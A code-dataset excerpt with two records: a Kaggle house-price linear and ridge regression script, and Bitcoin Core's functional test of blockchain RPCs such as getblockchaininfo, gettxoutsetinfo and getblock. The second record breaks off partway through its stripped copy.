b1f885dc798ca4aae47661e0a27fe0e21e4ee4e0
[ "MIT" ]
null
null
null
Linear_Ridge_Regression .py
Nirmal1313/Regression-Methods
b1f885dc798ca4aae47661e0a27fe0e21e4ee4e0
[ "MIT" ]
null
null
null
# coding: utf-8 # In[1]: import pandas as pd # for working with data in Python import numpy as np import matplotlib.pyplot as plt # for visualization from sklearn.model_selection import train_test_split from sklearn.metrics import mean_squared_error from sklearn import linear_model # use Pandas to read in csv files. The pd.read_csv() method creates a DataFrame from a csv file train = pd.read_csv('train.csv') test = pd.read_csv('test.csv') print("1 \n") # check out the size of the data print("Train data shape:", train.shape) print("Test data shape:", test.shape) print("2 \n") # look at a few rows using the DataFrame.head() method # train.head() print(train.head()) # In[3]: plt.style.use(style='ggplot') plt.rcParams['figure.figsize'] = (10, 6) ####################################################### # 2. Explore the data and engineer Features ### ####################################################### print("3 \n") # In[4]: # to get more information like count, mean, std, min, max etc # train.SalePrice.describe() print (train.SalePrice.describe()) print("4 \n") # to plot a histogram of SalePrice print ("Skew is:", train.SalePrice.skew()) plt.hist(train.SalePrice, color='blue') plt.show() print("5 \n") # In[5]: # use np.log() to transform train.SalePric and calculate the skewness a second time, as well as re-plot the data target = np.log(train.SalePrice) print ("\n Skew is:", target.skew()) plt.hist(target, color='blue') plt.show() # In[6]: # return a subset of columns matching the specified data types numeric_features = train.select_dtypes(include=[np.number]) # numeric_features.dtypes print(numeric_features.dtypes) # In[7]: corr = numeric_features.corr() # The first five features are the most positively correlated with SalePrice, while the next five are the most negatively correlated. print (corr['SalePrice'].sort_values(ascending=False)[:5], '\n') print (corr['SalePrice'].sort_values(ascending=False)[-5:]) # In[8]: print(train.OverallQual.unique()) """ print("9 \n") """ #investigate the relationship between OverallQual and SalePrice. #We set index='OverallQual' and values='SalePrice'. We chose to look at the median here. quality_pivot = train.pivot_table(index='OverallQual', values='SalePrice', aggfunc=np.median) print(quality_pivot) # In[11]: #visualize this pivot table more easily, we can create a bar plot #Notice that the median sales price strictly increases as Overall Quality increases. quality_pivot.plot(kind='bar', color='blue') plt.xlabel('Overall Quality') plt.ylabel('Median Sale Price') plt.xticks(rotation=0) plt.show() # In[12]: print("11 \n") """ #to generate some scatter plots and visualize the relationship between the Ground Living Area(GrLivArea) and SalePrice plt.scatter(x=train['GrLivArea'], y=target) plt.ylabel('Sale Price') plt.xlabel('Above grade (ground) living area square feet') plt.show() """ print("12 \n") # do the same for GarageArea. plt.scatter(x=train['GarageArea'], y=target) plt.ylabel('Sale Price') plt.xlabel('Garage Area') plt.show() # In[13]: # create a new dataframe with some outliers removed train = train[train['GarageArea'] < 1200] # display the previous graph again without outliers plt.scatter(x=train['GarageArea'], y=np.log(train.SalePrice)) plt.xlim(-200,1600) # This forces the same scale as before plt.ylabel('Sale Price') plt.xlabel('Garage Area') plt.show() # In[14]: # create a DataFrame to view the top null columns and return the counts of the null values in each column nulls = pd.DataFrame(train.isnull().sum().sort_values(ascending=False)[:25]) nulls.columns = ['Null Count'] nulls.index.name = 'Feature' #nulls print(nulls) # In[15]: print("15 \n") """ #to return a list of the unique values print ("Unique values are:", train.MiscFeature.unique()) """ ###################################################### # Wrangling the non-numeric Features ## ###################################################### print("16 \n") # consider the non-numeric features and display details of columns categoricals = train.select_dtypes(exclude=[np.number]) #categoricals.describe() print(categoricals.describe()) # In[16]: ##################################################### # Transforming and engineering features ## ###################################################### print("17 \n") # When transforming features, it's important to remember that any transformations that you've applied to the training data before # fitting the model must be applied to the test data. #Eg: print ("Original: \n") print (train.Street.value_counts(), "\n") # In[17]: print("18 \n") # our model needs numerical data, so we will use one-hot encoding to transform the data into a Boolean column. # create a new column called enc_street. The pd.get_dummies() method will handle this for us train['enc_street'] = pd.get_dummies(train.Street, drop_first=True) test['enc_street'] = pd.get_dummies(test.Street, drop_first=True) print ('Encoded: \n') print (train.enc_street.value_counts()) # Pave and Grvl values converted into 1 and 0 print("19 \n") # look at SaleCondition by constructing and plotting a pivot table, as we did above for OverallQual condition_pivot = train.pivot_table(index='SaleCondition', values='SalePrice', aggfunc=np.median) condition_pivot.plot(kind='bar', color='blue') plt.xlabel('Sale Condition') plt.ylabel('Median Sale Price') plt.xticks(rotation=0) plt.show() # In[18]: # encode this SaleCondition as a new feature by using a similar method that we used for Street above def encode(x): return 1 if x == 'Partial' else 0 train['enc_condition'] = train.SaleCondition.apply(encode) test['enc_condition'] = test.SaleCondition.apply(encode) print("20 \n") # explore this newly modified feature as a plot. condition_pivot = train.pivot_table(index='enc_condition', values='SalePrice', aggfunc=np.median) condition_pivot.plot(kind='bar', color='blue') plt.xlabel('Encoded Sale Condition') plt.ylabel('Median Sale Price') plt.xticks(rotation=0) plt.show() # In[19]: ###################################################################################################### # Dealing with missing values # # We'll fill the missing values with an average value and then assign the results to data # # This is a method of interpolation # ###################################################################################################### data = train.select_dtypes(include=[np.number]).interpolate().dropna() print("21 \n") # Check if the all of the columns have 0 null values. # sum(data.isnull().sum() != 0) print(sum(data.isnull().sum() != 0)) print("22 \n") # In[20]: ###################################################### # 3. Build a linear model ## ###################################################### # separate the features and the target variable for modeling. # We will assign the features to X and the target variable(Sales Price)to y. y = np.log(train.SalePrice) X = data.drop(['SalePrice', 'Id'], axis=1) # exclude ID from features since Id is just an index with no relationship to SalePrice. #======= partition the data ===================================================================================================# # Partitioning the data in this way allows us to evaluate how our model might perform on data that it has never seen before. # If we train the model on all of the test data, it will be difficult to tell if overfitting has taken place. #==============================================================================================================================# # also state how many percentage from train data set, we want to take as test data set # In this example, about 33% of the data is devoted to the hold-out set. X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42, test_size=.33) # In[21]: #========= Begin modelling =========================# # Linear Regression Model # #===================================================# # ---- first create a Linear Regression model. # First, we instantiate the model. lr = linear_model.LinearRegression() # ---- fit the model / Model fitting # lr.fit() method will fit the linear regression on the features and target variable that we pass. model = lr.fit(X_train, y_train) print("23 \n") # In[22]: # ---- Evaluate the performance and visualize results # r-squared value is a measure of how close the data are to the fitted regression line # a higher r-squared value means a better fit(very close to value 1) print("R^2 is: \n", model.score(X_test, y_test)) # use the model we have built to make predictions on the test data set. predictions = model.predict(X_test) print("24 \n") # In[23]: print('RMSE is: \n', mean_squared_error(y_test, predictions)) print("25 \n") # view this relationship between predictions and actual_values graphically with a scatter plot. actual_values = y_test plt.scatter(predictions, actual_values, alpha=.75, color='b') # alpha helps to show overlapping data plt.xlabel('Predicted Price') plt.ylabel('Actual Price') plt.title('Linear Regression Model') plt.show() # In[24]: #====== improve the model ================================================================# # try using Ridge Regularization to decrease the influence of less important features # #=========================================================================================# print("26 \n") # experiment by looping through a few different values of alpha, and see how this changes our results. for i in range (-2, 3): alpha = 10**i rm = linear_model.Ridge(alpha=alpha) ridge_model = rm.fit(X_train, y_train) preds_ridge = ridge_model.predict(X_test) plt.scatter(preds_ridge, actual_values, alpha=.75, color='b') plt.xlabel('Predicted Price') plt.ylabel('Actual Price') plt.title('Ridge Regularization with alpha = {}'.format(alpha)) overlay = 'R^2 is: {}\nRMSE is: {}'.format( ridge_model.score(X_test, y_test), mean_squared_error(y_test, preds_ridge)) plt.annotate(s=overlay,xy=(12.1,10.6),size='x-large') plt.show() # if you examined the plots you can see these models perform almost identically to the first model. # In our case, adjusting the alpha did not substantially improve our model. print("27 \n") print("R^2 is: \n", model.score(X_test, y_test)) # In[25]: ###################################################### # 4. Make a submission ## ###################################################### # create a csv that contains the predicted SalePrice for each observation in the test.csv dataset. submission = pd.DataFrame() # The first column must the contain the ID from the test data. submission['Id'] = test.Id # select the features from the test data for the model as we did above. feats = test.select_dtypes( include=[np.number]).drop(['Id'], axis=1).interpolate() # generate predictions predictions = model.predict(feats) # transform the predictions to the correct form # apply np.exp() to our predictions becasuse we have taken the logarithm(np.log()) previously. final_predictions = np.exp(predictions) print("28 \n") # check the difference print("Original predictions are: \n", predictions[:10], "\n") print("Final predictions are: \n", final_predictions[:10]) print("29 \n") # assign these predictions and check submission['SalePrice'] = final_predictions # submission.head() print(submission.head()) # export to a .csv file as Kaggle expects. # pass index=False because Pandas otherwise would create a new index for us. submission.to_csv('submission1.csv', index=False) print("\n Finish")
29.222494
132
0.632865
import pandas as pd import numpy as np import matplotlib.pyplot as plt from sklearn.model_selection import train_test_split from sklearn.metrics import mean_squared_error from sklearn import linear_model train = pd.read_csv('train.csv') test = pd.read_csv('test.csv') print("1 \n") print("Train data shape:", train.shape) print("Test data shape:", test.shape) print("2 \n") print(train.head()) plt.style.use(style='ggplot') plt.rcParams['figure.figsize'] = (10, 6)
true
true
f7290ff22916348c59aa6e233ad818395010ec56
18,267
py
Python
test/functional/rpc_blockchain.py
bitcoincore-dev/bitcoin
3f083a5bbdbb41cfa6be8f9d4b0e306515bfa100
[ "MIT" ]
9
2016-08-19T18:42:36.000Z
2022-03-29T08:13:38.000Z
test/functional/rpc_blockchain.py
taweesak0803650558/bitcoin
fd557ceb885ec55ac6865953e7325bcebc5a6972
[ "MIT" ]
3
2019-05-22T12:52:35.000Z
2021-08-01T16:13:24.000Z
test/functional/rpc_blockchain.py
taweesak0803650558/bitcoin
fd557ceb885ec55ac6865953e7325bcebc5a6972
[ "MIT" ]
7
2020-02-01T02:10:14.000Z
2022-03-29T08:13:26.000Z
#!/usr/bin/env python3 # Copyright (c) 2014-2020 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test RPCs related to blockchainstate. Test the following RPCs: - getblockchaininfo - gettxoutsetinfo - getdifficulty - getbestblockhash - getblockhash - getblockheader - getchaintxstats - getnetworkhashps - verifychain Tests correspond to code in rpc/blockchain.cpp. """ from decimal import Decimal import http.client import os import subprocess from test_framework.address import ADDRESS_BCRT1_P2WSH_OP_TRUE from test_framework.blocktools import ( create_block, create_coinbase, TIME_GENESIS_BLOCK, ) from test_framework.messages import ( CBlockHeader, from_hex, msg_block, ) from test_framework.p2p import P2PInterface from test_framework.test_framework import BitcoinTestFramework from test_framework.util import ( assert_equal, assert_greater_than, assert_greater_than_or_equal, assert_raises, assert_raises_rpc_error, assert_is_hex_string, assert_is_hash_string, get_datadir_path, ) from test_framework.wallet import MiniWallet class BlockchainTest(BitcoinTestFramework): def set_test_params(self): self.setup_clean_chain = True self.num_nodes = 1 self.supports_cli = False def run_test(self): self.mine_chain() self.restart_node(0, extra_args=['-stopatheight=207', '-prune=1']) # Set extra args with pruning after rescan is complete self._test_getblockchaininfo() self._test_getchaintxstats() self._test_gettxoutsetinfo() self._test_getblockheader() self._test_getdifficulty() self._test_getnetworkhashps() self._test_stopatheight() self._test_waitforblockheight() self._test_getblock() assert self.nodes[0].verifychain(4, 0) def mine_chain(self): self.log.info('Create some old blocks') for t in range(TIME_GENESIS_BLOCK, TIME_GENESIS_BLOCK + 200 * 600, 600): # ten-minute steps from genesis block time self.nodes[0].setmocktime(t) self.nodes[0].generatetoaddress(1, ADDRESS_BCRT1_P2WSH_OP_TRUE) assert_equal(self.nodes[0].getblockchaininfo()['blocks'], 200) def _test_getblockchaininfo(self): self.log.info("Test getblockchaininfo") keys = [ 'bestblockhash', 'blocks', 'chain', 'chainwork', 'difficulty', 'headers', 'initialblockdownload', 'mediantime', 'pruned', 'size_on_disk', 'softforks', 'time', 'verificationprogress', 'warnings', ] res = self.nodes[0].getblockchaininfo() assert isinstance(res['time'], int) # result should have these additional pruning keys if manual pruning is enabled assert_equal(sorted(res.keys()), sorted(['pruneheight', 'automatic_pruning'] + keys)) # size_on_disk should be > 0 assert_greater_than(res['size_on_disk'], 0) # pruneheight should be greater or equal to 0 assert_greater_than_or_equal(res['pruneheight'], 0) # check other pruning fields given that prune=1 assert res['pruned'] assert not res['automatic_pruning'] self.restart_node(0, ['-stopatheight=207']) res = self.nodes[0].getblockchaininfo() # should have exact keys assert_equal(sorted(res.keys()), keys) self.restart_node(0, ['-stopatheight=207', '-prune=550']) res = self.nodes[0].getblockchaininfo() # result should have these additional pruning keys if prune=550 assert_equal(sorted(res.keys()), sorted(['pruneheight', 'automatic_pruning', 'prune_target_size'] + keys)) # check related fields assert res['pruned'] assert_equal(res['pruneheight'], 0) assert res['automatic_pruning'] assert_equal(res['prune_target_size'], 576716800) assert_greater_than(res['size_on_disk'], 0) assert_equal(res['softforks'], { 'bip34': {'type': 'buried', 'active': False, 'height': 500}, 'bip66': {'type': 'buried', 'active': False, 'height': 1251}, 'bip65': {'type': 'buried', 'active': False, 'height': 1351}, 'csv': {'type': 'buried', 'active': False, 'height': 432}, 'segwit': {'type': 'buried', 'active': True, 'height': 0}, 'testdummy': { 'type': 'bip9', 'bip9': { 'status': 'started', 'bit': 28, 'start_time': 0, 'timeout': 0x7fffffffffffffff, # testdummy does not have a timeout so is set to the max int64 value 'since': 144, 'statistics': { 'period': 144, 'threshold': 108, 'elapsed': 57, 'count': 57, 'possible': True, }, 'min_activation_height': 0, }, 'active': False }, 'taproot': { 'type': 'bip9', 'bip9': { 'status': 'active', 'start_time': -1, 'timeout': 9223372036854775807, 'since': 0, 'min_activation_height': 0, }, 'height': 0, 'active': True } }) def _test_getchaintxstats(self): self.log.info("Test getchaintxstats") # Test `getchaintxstats` invalid extra parameters assert_raises_rpc_error(-1, 'getchaintxstats', self.nodes[0].getchaintxstats, 0, '', 0) # Test `getchaintxstats` invalid `nblocks` assert_raises_rpc_error(-1, "JSON value is not an integer as expected", self.nodes[0].getchaintxstats, '') assert_raises_rpc_error(-8, "Invalid block count: should be between 0 and the block's height - 1", self.nodes[0].getchaintxstats, -1) assert_raises_rpc_error(-8, "Invalid block count: should be between 0 and the block's height - 1", self.nodes[0].getchaintxstats, self.nodes[0].getblockcount()) # Test `getchaintxstats` invalid `blockhash` assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].getchaintxstats, blockhash=0) assert_raises_rpc_error(-8, "blockhash must be of length 64 (not 1, for '0')", self.nodes[0].getchaintxstats, blockhash='0') assert_raises_rpc_error(-8, "blockhash must be hexadecimal string (not 'ZZZ0000000000000000000000000000000000000000000000000000000000000')", self.nodes[0].getchaintxstats, blockhash='ZZZ0000000000000000000000000000000000000000000000000000000000000') assert_raises_rpc_error(-5, "Block not found", self.nodes[0].getchaintxstats, blockhash='0000000000000000000000000000000000000000000000000000000000000000') blockhash = self.nodes[0].getblockhash(200) self.nodes[0].invalidateblock(blockhash) assert_raises_rpc_error(-8, "Block is not in main chain", self.nodes[0].getchaintxstats, blockhash=blockhash) self.nodes[0].reconsiderblock(blockhash) chaintxstats = self.nodes[0].getchaintxstats(nblocks=1) # 200 txs plus genesis tx assert_equal(chaintxstats['txcount'], 201) # tx rate should be 1 per 10 minutes, or 1/600 # we have to round because of binary math assert_equal(round(chaintxstats['txrate'] * 600, 10), Decimal(1)) b1_hash = self.nodes[0].getblockhash(1) b1 = self.nodes[0].getblock(b1_hash) b200_hash = self.nodes[0].getblockhash(200) b200 = self.nodes[0].getblock(b200_hash) time_diff = b200['mediantime'] - b1['mediantime'] chaintxstats = self.nodes[0].getchaintxstats() assert_equal(chaintxstats['time'], b200['time']) assert_equal(chaintxstats['txcount'], 201) assert_equal(chaintxstats['window_final_block_hash'], b200_hash) assert_equal(chaintxstats['window_final_block_height'], 200) assert_equal(chaintxstats['window_block_count'], 199) assert_equal(chaintxstats['window_tx_count'], 199) assert_equal(chaintxstats['window_interval'], time_diff) assert_equal(round(chaintxstats['txrate'] * time_diff, 10), Decimal(199)) chaintxstats = self.nodes[0].getchaintxstats(blockhash=b1_hash) assert_equal(chaintxstats['time'], b1['time']) assert_equal(chaintxstats['txcount'], 2) assert_equal(chaintxstats['window_final_block_hash'], b1_hash) assert_equal(chaintxstats['window_final_block_height'], 1) assert_equal(chaintxstats['window_block_count'], 0) assert 'window_tx_count' not in chaintxstats assert 'window_interval' not in chaintxstats assert 'txrate' not in chaintxstats def _test_gettxoutsetinfo(self): node = self.nodes[0] res = node.gettxoutsetinfo() assert_equal(res['total_amount'], Decimal('8725.00000000')) assert_equal(res['transactions'], 200) assert_equal(res['height'], 200) assert_equal(res['txouts'], 200) assert_equal(res['bogosize'], 16800), assert_equal(res['bestblock'], node.getblockhash(200)) size = res['disk_size'] assert size > 6400 assert size < 64000 assert_equal(len(res['bestblock']), 64) assert_equal(len(res['hash_serialized_2']), 64) self.log.info("Test that gettxoutsetinfo() works for blockchain with just the genesis block") b1hash = node.getblockhash(1) node.invalidateblock(b1hash) res2 = node.gettxoutsetinfo() assert_equal(res2['transactions'], 0) assert_equal(res2['total_amount'], Decimal('0')) assert_equal(res2['height'], 0) assert_equal(res2['txouts'], 0) assert_equal(res2['bogosize'], 0), assert_equal(res2['bestblock'], node.getblockhash(0)) assert_equal(len(res2['hash_serialized_2']), 64) self.log.info("Test that gettxoutsetinfo() returns the same result after invalidate/reconsider block") node.reconsiderblock(b1hash) res3 = node.gettxoutsetinfo() # The field 'disk_size' is non-deterministic and can thus not be # compared between res and res3. Everything else should be the same. del res['disk_size'], res3['disk_size'] assert_equal(res, res3) self.log.info("Test hash_type option for gettxoutsetinfo()") # Adding hash_type 'hash_serialized_2', which is the default, should # not change the result. res4 = node.gettxoutsetinfo(hash_type='hash_serialized_2') del res4['disk_size'] assert_equal(res, res4) # hash_type none should not return a UTXO set hash. res5 = node.gettxoutsetinfo(hash_type='none') assert 'hash_serialized_2' not in res5 # hash_type muhash should return a different UTXO set hash. res6 = node.gettxoutsetinfo(hash_type='muhash') assert 'muhash' in res6 assert(res['hash_serialized_2'] != res6['muhash']) # muhash should not be returned unless requested. for r in [res, res2, res3, res4, res5]: assert 'muhash' not in r # Unknown hash_type raises an error assert_raises_rpc_error(-8, "foohash is not a valid hash_type", node.gettxoutsetinfo, "foohash") def _test_getblockheader(self): node = self.nodes[0] assert_raises_rpc_error(-8, "hash must be of length 64 (not 8, for 'nonsense')", node.getblockheader, "nonsense") assert_raises_rpc_error(-8, "hash must be hexadecimal string (not 'ZZZ7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844')", node.getblockheader, "ZZZ7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844") assert_raises_rpc_error(-5, "Block not found", node.getblockheader, "0cf7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844") besthash = node.getbestblockhash() secondbesthash = node.getblockhash(199) header = node.getblockheader(blockhash=besthash) assert_equal(header['hash'], besthash) assert_equal(header['height'], 200) assert_equal(header['confirmations'], 1) assert_equal(header['previousblockhash'], secondbesthash) assert_is_hex_string(header['chainwork']) assert_equal(header['nTx'], 1) assert_is_hash_string(header['hash']) assert_is_hash_string(header['previousblockhash']) assert_is_hash_string(header['merkleroot']) assert_is_hash_string(header['bits'], length=None) assert isinstance(header['time'], int) assert isinstance(header['mediantime'], int) assert isinstance(header['nonce'], int) assert isinstance(header['version'], int) assert isinstance(int(header['versionHex'], 16), int) assert isinstance(header['difficulty'], Decimal) # Test with verbose=False, which should return the header as hex. header_hex = node.getblockheader(blockhash=besthash, verbose=False) assert_is_hex_string(header_hex) header = from_hex(CBlockHeader(), header_hex) header.calc_sha256() assert_equal(header.hash, besthash) assert 'previousblockhash' not in node.getblockheader(node.getblockhash(0)) assert 'nextblockhash' not in node.getblockheader(node.getbestblockhash()) def _test_getdifficulty(self): difficulty = self.nodes[0].getdifficulty() # 1 hash in 2 should be valid, so difficulty should be 1/2**31 # binary => decimal => binary math is why we do this check assert abs(difficulty * 2**31 - 1) < 0.0001 def _test_getnetworkhashps(self): hashes_per_second = self.nodes[0].getnetworkhashps() # This should be 2 hashes every 10 minutes or 1/300 assert abs(hashes_per_second * 300 - 1) < 0.0001 def _test_stopatheight(self): assert_equal(self.nodes[0].getblockcount(), 200) self.nodes[0].generatetoaddress(6, ADDRESS_BCRT1_P2WSH_OP_TRUE) assert_equal(self.nodes[0].getblockcount(), 206) self.log.debug('Node should not stop at this height') assert_raises(subprocess.TimeoutExpired, lambda: self.nodes[0].process.wait(timeout=3)) try: self.nodes[0].generatetoaddress(1, ADDRESS_BCRT1_P2WSH_OP_TRUE) except (ConnectionError, http.client.BadStatusLine): pass # The node already shut down before response self.log.debug('Node should stop at this height...') self.nodes[0].wait_until_stopped() self.start_node(0) assert_equal(self.nodes[0].getblockcount(), 207) def _test_waitforblockheight(self): self.log.info("Test waitforblockheight") node = self.nodes[0] peer = node.add_p2p_connection(P2PInterface()) current_height = node.getblock(node.getbestblockhash())['height'] # Create a fork somewhere below our current height, invalidate the tip # of that fork, and then ensure that waitforblockheight still # works as expected. # # (Previously this was broken based on setting # `rpc/blockchain.cpp:latestblock` incorrectly.) # b20hash = node.getblockhash(20) b20 = node.getblock(b20hash) def solve_and_send_block(prevhash, height, time): b = create_block(prevhash, create_coinbase(height), time) b.solve() peer.send_and_ping(msg_block(b)) return b b21f = solve_and_send_block(int(b20hash, 16), 21, b20['time'] + 1) b22f = solve_and_send_block(b21f.sha256, 22, b21f.nTime + 1) node.invalidateblock(b22f.hash) def assert_waitforheight(height, timeout=2): assert_equal( node.waitforblockheight(height=height, timeout=timeout)['height'], current_height) assert_waitforheight(0) assert_waitforheight(current_height - 1) assert_waitforheight(current_height) assert_waitforheight(current_height + 1) def _test_getblock(self): node = self.nodes[0] miniwallet = MiniWallet(node) miniwallet.scan_blocks(num=5) fee_per_byte = Decimal('0.00000010') fee_per_kb = 1000 * fee_per_byte miniwallet.send_self_transfer(fee_rate=fee_per_kb, from_node=node) blockhash = node.generate(1)[0] self.log.info("Test that getblock with verbosity 1 doesn't include fee") block = node.getblock(blockhash, 1) assert 'fee' not in block['tx'][1] self.log.info('Test that getblock with verbosity 2 includes expected fee') block = node.getblock(blockhash, 2) tx = block['tx'][1] assert 'fee' in tx assert_equal(tx['fee'], tx['vsize'] * fee_per_byte) self.log.info("Test that getblock with verbosity 2 still works with pruned Undo data") datadir = get_datadir_path(self.options.tmpdir, 0) self.log.info("Test that getblock with invalid verbosity type returns proper error message") assert_raises_rpc_error(-1, "JSON value is not an integer as expected", node.getblock, blockhash, "2") def move_block_file(old, new): old_path = os.path.join(datadir, self.chain, 'blocks', old) new_path = os.path.join(datadir, self.chain, 'blocks', new) os.rename(old_path, new_path) # Move instead of deleting so we can restore chain state afterwards move_block_file('rev00000.dat', 'rev_wrong') block = node.getblock(blockhash, 2) assert 'fee' not in block['tx'][1] # Restore chain state move_block_file('rev_wrong', 'rev00000.dat') assert 'previousblockhash' not in node.getblock(node.getblockhash(0)) assert 'nextblockhash' not in node.getblock(node.getbestblockhash()) if __name__ == '__main__': BlockchainTest().main()
41.610478
257
0.646685
from decimal import Decimal import http.client import os import subprocess from test_framework.address import ADDRESS_BCRT1_P2WSH_OP_TRUE from test_framework.blocktools import ( create_block, create_coinbase, TIME_GENESIS_BLOCK, ) from test_framework.messages import ( CBlockHeader, from_hex, msg_block, ) from test_framework.p2p import P2PInterface from test_framework.test_framework import BitcoinTestFramework from test_framework.util import ( assert_equal, assert_greater_than, assert_greater_than_or_equal, assert_raises, assert_raises_rpc_error, assert_is_hex_string, assert_is_hash_string, get_datadir_path, ) from test_framework.wallet import MiniWallet class BlockchainTest(BitcoinTestFramework): def set_test_params(self): self.setup_clean_chain = True self.num_nodes = 1 self.supports_cli = False def run_test(self): self.mine_chain() self.restart_node(0, extra_args=['-stopatheight=207', '-prune=1']) self._test_getblockchaininfo() self._test_getchaintxstats() self._test_gettxoutsetinfo() self._test_getblockheader() self._test_getdifficulty() self._test_getnetworkhashps() self._test_stopatheight() self._test_waitforblockheight() self._test_getblock() assert self.nodes[0].verifychain(4, 0) def mine_chain(self): self.log.info('Create some old blocks') for t in range(TIME_GENESIS_BLOCK, TIME_GENESIS_BLOCK + 200 * 600, 600): self.nodes[0].setmocktime(t) self.nodes[0].generatetoaddress(1, ADDRESS_BCRT1_P2WSH_OP_TRUE) assert_equal(self.nodes[0].getblockchaininfo()['blocks'], 200) def _test_getblockchaininfo(self): self.log.info("Test getblockchaininfo") keys = [ 'bestblockhash', 'blocks', 'chain', 'chainwork', 'difficulty', 'headers', 'initialblockdownload', 'mediantime', 'pruned', 'size_on_disk', 'softforks', 'time', 'verificationprogress', 'warnings', ] res = self.nodes[0].getblockchaininfo() assert isinstance(res['time'], int) assert_equal(sorted(res.keys()), sorted(['pruneheight', 'automatic_pruning'] + keys)) assert_greater_than(res['size_on_disk'], 0) assert_greater_than_or_equal(res['pruneheight'], 0) assert res['pruned'] assert not res['automatic_pruning'] self.restart_node(0, ['-stopatheight=207']) res = self.nodes[0].getblockchaininfo() assert_equal(sorted(res.keys()), keys) self.restart_node(0, ['-stopatheight=207', '-prune=550']) res = self.nodes[0].getblockchaininfo() assert_equal(sorted(res.keys()), sorted(['pruneheight', 'automatic_pruning', 'prune_target_size'] + keys)) assert res['pruned'] assert_equal(res['pruneheight'], 0) assert res['automatic_pruning'] assert_equal(res['prune_target_size'], 576716800) assert_greater_than(res['size_on_disk'], 0) assert_equal(res['softforks'], { 'bip34': {'type': 'buried', 'active': False, 'height': 500}, 'bip66': {'type': 'buried', 'active': False, 'height': 1251}, 'bip65': {'type': 'buried', 'active': False, 'height': 1351}, 'csv': {'type': 'buried', 'active': False, 'height': 432}, 'segwit': {'type': 'buried', 'active': True, 'height': 0}, 'testdummy': { 'type': 'bip9', 'bip9': { 'status': 'started', 'bit': 28, 'start_time': 0, 'timeout': 0x7fffffffffffffff, 'since': 144, 'statistics': { 'period': 144, 'threshold': 108, 'elapsed': 57, 'count': 57, 'possible': True, }, 'min_activation_height': 0, }, 'active': False }, 'taproot': { 'type': 'bip9', 'bip9': { 'status': 'active', 'start_time': -1, 'timeout': 9223372036854775807, 'since': 0, 'min_activation_height': 0, }, 'height': 0, 'active': True } }) def _test_getchaintxstats(self): self.log.info("Test getchaintxstats") assert_raises_rpc_error(-1, 'getchaintxstats', self.nodes[0].getchaintxstats, 0, '', 0) assert_raises_rpc_error(-1, "JSON value is not an integer as expected", self.nodes[0].getchaintxstats, '') assert_raises_rpc_error(-8, "Invalid block count: should be between 0 and the block's height - 1", self.nodes[0].getchaintxstats, -1) assert_raises_rpc_error(-8, "Invalid block count: should be between 0 and the block's height - 1", self.nodes[0].getchaintxstats, self.nodes[0].getblockcount()) assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].getchaintxstats, blockhash=0) assert_raises_rpc_error(-8, "blockhash must be of length 64 (not 1, for '0')", self.nodes[0].getchaintxstats, blockhash='0') assert_raises_rpc_error(-8, "blockhash must be hexadecimal string (not 'ZZZ0000000000000000000000000000000000000000000000000000000000000')", self.nodes[0].getchaintxstats, blockhash='ZZZ0000000000000000000000000000000000000000000000000000000000000') assert_raises_rpc_error(-5, "Block not found", self.nodes[0].getchaintxstats, blockhash='0000000000000000000000000000000000000000000000000000000000000000') blockhash = self.nodes[0].getblockhash(200) self.nodes[0].invalidateblock(blockhash) assert_raises_rpc_error(-8, "Block is not in main chain", self.nodes[0].getchaintxstats, blockhash=blockhash) self.nodes[0].reconsiderblock(blockhash) chaintxstats = self.nodes[0].getchaintxstats(nblocks=1) assert_equal(chaintxstats['txcount'], 201) assert_equal(round(chaintxstats['txrate'] * 600, 10), Decimal(1)) b1_hash = self.nodes[0].getblockhash(1) b1 = self.nodes[0].getblock(b1_hash) b200_hash = self.nodes[0].getblockhash(200) b200 = self.nodes[0].getblock(b200_hash) time_diff = b200['mediantime'] - b1['mediantime'] chaintxstats = self.nodes[0].getchaintxstats() assert_equal(chaintxstats['time'], b200['time']) assert_equal(chaintxstats['txcount'], 201) assert_equal(chaintxstats['window_final_block_hash'], b200_hash) assert_equal(chaintxstats['window_final_block_height'], 200) assert_equal(chaintxstats['window_block_count'], 199) assert_equal(chaintxstats['window_tx_count'], 199) assert_equal(chaintxstats['window_interval'], time_diff) assert_equal(round(chaintxstats['txrate'] * time_diff, 10), Decimal(199)) chaintxstats = self.nodes[0].getchaintxstats(blockhash=b1_hash) assert_equal(chaintxstats['time'], b1['time']) assert_equal(chaintxstats['txcount'], 2) assert_equal(chaintxstats['window_final_block_hash'], b1_hash) assert_equal(chaintxstats['window_final_block_height'], 1) assert_equal(chaintxstats['window_block_count'], 0) assert 'window_tx_count' not in chaintxstats assert 'window_interval' not in chaintxstats assert 'txrate' not in chaintxstats def _test_gettxoutsetinfo(self): node = self.nodes[0] res = node.gettxoutsetinfo() assert_equal(res['total_amount'], Decimal('8725.00000000')) assert_equal(res['transactions'], 200) assert_equal(res['height'], 200) assert_equal(res['txouts'], 200) assert_equal(res['bogosize'], 16800), assert_equal(res['bestblock'], node.getblockhash(200)) size = res['disk_size'] assert size > 6400 assert size < 64000 assert_equal(len(res['bestblock']), 64) assert_equal(len(res['hash_serialized_2']), 64) self.log.info("Test that gettxoutsetinfo() works for blockchain with just the genesis block") b1hash = node.getblockhash(1) node.invalidateblock(b1hash) res2 = node.gettxoutsetinfo() assert_equal(res2['transactions'], 0) assert_equal(res2['total_amount'], Decimal('0')) assert_equal(res2['height'], 0) assert_equal(res2['txouts'], 0) assert_equal(res2['bogosize'], 0), assert_equal(res2['bestblock'], node.getblockhash(0)) assert_equal(len(res2['hash_serialized_2']), 64) self.log.info("Test that gettxoutsetinfo() returns the same result after invalidate/reconsider block") node.reconsiderblock(b1hash) res3 = node.gettxoutsetinfo() del res['disk_size'], res3['disk_size'] assert_equal(res, res3) self.log.info("Test hash_type option for gettxoutsetinfo()") res4 = node.gettxoutsetinfo(hash_type='hash_serialized_2') del res4['disk_size'] assert_equal(res, res4) res5 = node.gettxoutsetinfo(hash_type='none') assert 'hash_serialized_2' not in res5 res6 = node.gettxoutsetinfo(hash_type='muhash') assert 'muhash' in res6 assert(res['hash_serialized_2'] != res6['muhash']) for r in [res, res2, res3, res4, res5]: assert 'muhash' 